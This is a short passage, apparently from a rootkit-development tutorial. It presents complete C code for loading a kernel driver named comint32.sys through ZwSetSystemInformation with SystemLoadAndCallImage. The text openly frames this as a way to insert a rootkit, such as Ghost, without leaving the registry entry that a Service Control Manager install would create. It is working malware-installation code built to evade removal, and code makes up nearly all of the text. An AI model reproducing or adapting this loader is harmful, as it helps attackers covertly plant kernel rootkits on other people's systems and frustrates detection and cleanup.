ZwSetSystemInformation with SystemLoadAndCallImage

Rootkits installed with the Service Control Manager, like Ghost, leave a registry entry that can be easily removed. To prevent this type of installation vulnerability, a startup executable program can be used to insert a rootkit using ZwSetSystemInformation with SystemLoadAndCallImage instead of using the Service Control Manager. Here’s the code:

  #include <windows.h> #include <stdio.h> #define SystemLoadAndCallImage 38 typedef long NTSTATUS; typedef struct _UNICODE_STRING {  USHORT Length;  USHORT MaximumLength;  PWSTR Buffer; } UNICODE_STRING; VOID (_stdcall *RtlInitUnicodeString)(  IN OUT UNICODE_STRING* DestinationString,  IN PCWSTR SourceString ); NTSTATUS (_stdcall *ZwSetSystemInformation)(  IN DWORD SystemInformationClass,  IN OUT PVOID SystemInformation,  IN LONG SystemInformationLength ); typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE {  UNICODE_STRING ModuleName; } SYSTEM_LOAD_AND_CALL_IMAGE; void main(void) {  NTSTATUS status;  SYSTEM_LOAD_AND_CALL_IMAGE MyDeviceDriver;  WCHAR imagepath[] = L"\\??\\C:\\comint32.sys"; RtlInitUnicodeString = (void*)GetProcAddress(GetModuleHandle("ntdll.dll"),   "RtlInitUnicodeString"); ZwSetSystemInformation = (void*)GetProcAddress(GetModuleHandle("ntdll.dll"),   "ZwSetSystemInformation");  if( RtlInitUnicodeString && ZwSetSystemInformation )  {   RtlInitUnicodeString( &( MyDeviceDriver.ModuleName), imagepath );   status = ZwSetSystemInformation(SystemLoadAndCallImage,    &MyDeviceDriver, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE));   if( status >= 0 )   {    printf( "MyDeviceDriver loaded!\n");    return;   }  }  printf( "MyDeviceDriver was not loaded!\n"); }